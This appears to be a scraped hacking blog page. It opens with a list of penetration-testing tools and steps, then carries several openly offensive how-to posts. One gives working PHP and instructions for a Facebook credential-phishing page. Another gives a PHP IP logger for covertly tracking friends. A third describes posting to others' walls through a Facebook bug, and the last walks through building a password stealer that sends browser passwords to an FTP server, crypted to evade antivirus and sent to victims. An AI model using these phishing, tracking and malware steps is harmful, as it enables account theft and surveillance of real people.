TOP 14 TOOLS THAT ETHICAL HACKER MUST HAVE !!!

Here is the List of tools that ethical HACKER must have a range of systems. These tools  are basically to reveal information which further results in a specific attacks on a given system. To locate weaknesses or error in a target system to gain as muchas information as possible about that network.

These tools Contains vulnerability scanning,  real exploits, Denial of Service, buffer overflow attacks and a wide range of networking integrated advanced utilities to perform such tests.

 .

.

Tools that ethical HACKER must have :

 .

1 – Nmap:

Nmap is used to scan addresses (IPV6 included), This tool is developed to gather a massive amount of information about the victim. It can scan open ports and much more.

This tool includes various scanning techniques e.g TCP connect(), UDP, TCP SYN (half open), Null scan, ACK sweep, Xmas Tree, FIN,  ICMP (ping sweep), ftp proxy (bounce attack), TCP SYN (half open),  IP Protocol, ICMP (ping sweep) and SYN sweep.

 .

2 – Wireshark:

This is very powerful tool for analysis and network troubleshooting. Wireshark is capable to view data from Live networking. It support media formats and hundreds of protocols. It is also used for development and education. Most Unix vendors and Linux supply their own Wireshark packages.

 .

3 – Cain & Able:

This tool is proven it’s self revolutionary in cyber mafia. It is capable of cracking passwords, several password retrieval jobs, routing/analyzing protocols and sniffing networks. Unlikly most of the tools it is just windows-only and is a twist to forensic tools & modern penetration testing.

 .

.

4 – MetaSploit:

MetaSploit is powerful network analysis and security tool. It is mostly used for penetration attacks because of it’s easily gathering information of victim and clean-interfacing technique.

 .

5 – Ettercap:

It is used for Man in the middle attack (MITM), these attacks are on Local area networks. It sniffs live connections & also got content filtering techniques. It has many features of host analysis and networking while it supports both active and passive dissections of various protocols.

 .

6 – Nessus:

This Tool provides vulnerability analysis of networks, asset profiling, high-speed data discovery and configuration auditing.

 .

7 – Havij:

Havij is most used testing tool for SQL injection and many other injections. It has features of database retrieval,  site’s scanning, password cracking and admin look-up. Basic purpose of it is to find  vulnerable websites and  breeze to hack.

.

8 – Kismet:

Kismet is 802.11 layer2 sniffer, wireless network detector and intrusion detection system. It supports every wireless card and can work with any appropriate hardware  on raw monitoring (rfmon) mode. Kismet supports plugin that can sniff media such as DECT. It can sniff  802.11a, 802.11n,  802.11b, sniff802.11g and traffic.

 .

9 – BackTrack Linux:

Backtrack is most popular and widely used tool bootable on CD of Linux Distro. It has got a large variety of penetration testing tools, VOIP networks, network attacks and many more testing/attacking of websites and systems. This tool is most user friendly because of its helpful and useful layout.

.

 .

10 – W3af:

W3af also known as web-focused Metasploit is an extremely flexible, popular, powerful & framework for finding vulnerabilities in exploiting web application. It’s vast features got dozens of exploitation and web assessment plugins.

 .

11 – Encase:

EnCase is computer forensics software mostly used by law enforcement agencies. Because of it’s vast usage and popularity it is forensics in a  a de-facto standard. This tool is being made to gather data from a computer in a forensically sound manner.

 .

12 – Helix:

Helix is bootable Ubuntu CD which contains multiple tools involving file systems, images, cellphones, computers & tied in to sheer power, it is very user friendly.

 .

13 – Acunetix:

Acunetix is Strong tool in website security purpose. It has variety of features for testing a website for various injections. Acunetix WVS basically checks the vulnerabilities of website, either XSS, SQL or other Injection are possible or not.

 .

14 – Burp Suite:

This tool is designed for performing testing regarding security of web applications. It  is an integrated platform and got various tools working togather to make a complete testing process. This tools is also used for exploiting security vulnerabilities & analysis of application attack surface from initial mapping.

.

.

The Penetration Test Process

• Discovery: The process Penetration tests is a Discovery in variety of techniques e.g  scan utilities, databases, Google data & much more to get as much information about the target as possible. These discoveries are basically to reveal sensitive information which further results in a specific attacks on a given system.

• Enumeration: After discovery of systems and specific networks the next step is to gain as much as information as possible about that network. The diffrence b/w Discovery & Enumeration depends upon state of intrusion. Enumeration task is to get reletive information about username while software and hardware version information are also obtained form it.

• Vulnerability Identification: This is most important step in penetration testing. In vulnerability identification you have to locate the week spot of target system. To locate weaknesses or error in a target system is must needed because after that you will get to know where to launch an attack.

• Exploitation and Launching of Attacks: After vulnerability has been located and you have identified the target’s weekspot now it is possible to launch the exploits. The main purpose of launching exploits is to get full access on victims’s system.

• Denial of Service: This term is known as dDos (Denial of Service). This is used to check the stability of the systems either it is crashed or not. It is good habit to check the strenght or stability of a system, before the real environment attack is being made.

Reporting: This is just for educational purpose. Now after you have completed penetration test it is recomended to get user customized  for technical overview, This includes detailed recommendations, executive summary, identified vulnerabilities & other security ID numbers. These reports may be in various forms i.e pdf, html, xml etc. while every report must be modified by user’s choice.

Read More

How to make phishing page for Facebook Step By Step

How to make phishing page for Facebook

1. Go to www.facebook.com/ and right click on an empty place anywhere on main Facebook page and select <View page source>
NOTE: This option may look different if you are using any other browser, Since i am using Google chrome, i get the following view. If you are using Firefox or any other browser, options may vary.

2. You will get the view of source code as following . Just hit <Ctrl + A>to select all code and <Ctrl + C> to copy it.

3. Paste the copied source code in any text editor . (I prefer Windows Notepad because it saves the text as plain).
Go to top of the page and hit <Ctrl + F>  and find  <action>
(you will probably find it in 5th or 6th line of coding.)

4. Now select the URL address with in quotes (right next to ‘action’) and replace it with <post.php>

Save this file on desktop with name ‘index.html‘  (you can save it with any other name)

Note : After you save a text file with .html extension. Web browser treats this file as a web page.
Congratulations! you have just achieved the hacking level 1 milestone (code junkie) by copying html code from a website successfully.
Now open that file and notice that this page looks like original Facebook page but the address in address bar shows that this page exists on your desktop.

5. Now its time to create the <post.php> file. Yes ! you guessed it right. its the same file we replaced URL with in step 4.
Ya ya, i know you guys are really smart.

Ok, all you have to do is to copy the following code and paste it in a new Notepad window and save it with name <post.php>

<?php
header ('Location:http:/www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

Your ‘post.php’ file is ready

Free Hosting:

• 110mb http://110mb.com
• Ripway http://ripway.com
• SuperFreeHost http://superfreehost.info
• FreeHostia http://freehostia.com
• Freeweb7 http://freeweb7.com
• t35 http://t35.com
• Awardspace http://awardspace.com
• PHPnet http://phpnet.us
• free Web Hosting Pro http://freewebhostingpro.com
• ProHosts http://prohosts.org
• FreeZoka http://www.freezoka.com/
• 000Webhost http://000webhost.com
• ATSpace http://atspace.co

Read More

How Khalil Hacked Zuckerberg’s page - the process

How Khalil Hacked Zuckerberg’s page - the process



It is very and very simple but only Allah has chosen Khalil to find this bug :) .. May Allah give him long life..






NOW THE PROCESS
1.goto your wall and  any message on status box but dont post.

2.open inspect element and you will see your id number there like in pic



Now replace this id with any other person id and then post your message and it will be posted on his/her wall but this bug is now fixed and will not work any more.. i just showed you the method :)

Kepp visiting my Blog for updates

Read More

How to get ip address of facebook friend very easy method

How to get ip address of facebook friend

  First open notepad and paste this code 

<?php 
$ip = $_SERVER['REMOTE_ADDR']; 
$dt = date("l dS \of F Y h:i:s A"); 
$file=fopen("ip_log.txt","a"); 
$data = $ip.' '.$dt."\n"; 
fwrite($file, $data); 
fclose($file); 
header( 'Location: http://hackersauthority.blogspot.com/) ; 
?>

Replace the black highlighted text with your picture or page link and now click save as and select all files and name it  as 

yourfilename.php

Step2 

1)Go to any webhosting site like  x10hosting.com

2) Signup for an account ( choose a right domain name e.g : Anonsoul.x10.mx )

3) After creating an account on x10hosting, go to the File Manager and open the public_htmldirectory

4) Click Upload, and select the PHP file that you created on Step1.4 (ip.php)

5) Select all permissions from Read/Write/Execute (777)

Step 3 getting the ip address 

After setting up an account and uploading the .PHP File, it's time to get IP Address of any Friend on Facebook

1) Go to the domain that you created in Step2. in my example Anonsoul.x10.mx

2) You'll see the PHP file that you created, right click>Copy Address Link

3) The link will be something like this : yourdomain.x10.mx/anything.php

In our example it will be: Anonsoul.x10.mx/ip.php

4) Send that link to any of your friends, after he/she clicks on the link, he/she will be redirected to the link that you replaced in step1.3 (in my example : ztuts.com )

5) Go to your domain name again like step1 (e.g: razor.x10.mx)

6) You'll see a new text document named ip_log.txt

7) Click that file, you'll get all IP Addresses of your friends that accessed that link.

Done!  Now you can track their IP Location using IP Tracer,

                            Please leave comments if it works :D

Read More

Hack Email, Facebook and Myspace Passwords Using Istealers

Hack Email, Facebook and Myspace Passwords Using Istealers

What are Stealer's ?

II Iit is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's  look like keyloggers but there are many differences, Stealer's steal only  passwords that stored in the web browsers they wont capture keystrokes typed by the user

Advantages of  Stealer's 

Its very easy to use, Its very small in size and thus Very easy to bypass antivirus detection by using some of the techniques mentioned below

Disadvantages 

It steals passwords that are only stored in the browsers and chat apps ,  This hack wont work if victim has not saved his passwords in his web browser , It has very few features Unlike a keylogger which has many features like live monitoring,  chat logs etc , Its not that stable as keyloggers

Hack Email, Facebook and Myspace Passwords Using Istealer

Things We Need :- 

1. Istealer - To Steal victims stored passwords ,You can download Istealer from here

2. Ftp Account - Create a free ftp account from www.drivehq.com

3. Crypter - To Bypass Antivirus detection You can download free FUD Crypter from here and the password is @hackholic

Note:- If you get an error saying COMDLG32.OCX  missing , Then Please download the missing OCX  from  Here

Procedure :-

1. First Download the Istealer Software from the link given above, extract the files using  winrar 

Note :- Your anti virus will start screaming saying its a virus , But its not a virus ,So please turn off your AV(antivirus) software's before extracting the files   

2.  After extracting the files open Istealer.exe ,  Enter Host as "ftp.drivehq.com" without quotes ,Then enter your FTP accounts details (login name and password ) which you created earlier, check all options on the right hand side as shown

4. Now check "bind with another file " and select the file which you want to bind with the Istealer ,Then hit "change the icon " and change the icon as you wish, i have also include an  icon pack you can also use those icons. Finally select build and save the out put file 

Now we have successfully created our server file but it is detected by Av's as virus, so we have to Crypt our server file, so as to bypass antivirus detection , To do that follow the steps given below 

1. Download the Free FUD- Crypter software from the link given above , 

2. Open the crypter Software , Select server file as the Istealer file you created ( file created in step 4) ,finally click crypt

Now your istealer is totally  undetectable,

Now simply send this file to your victim, when the victim opens it  he will only see the file or app which you binded in step 4,

 Mean while your istealer will install silently in the background, After which  it will send  logs (containing stored passwords form the victims browser)  to your ftp account, You can view your victims passwords by logging  into your ftp account ,By this way we are able to successfully  hack our victims Email, Facebook ,Myspace Passwords 

 

SORRY LINKS ARE DOWN 

Read More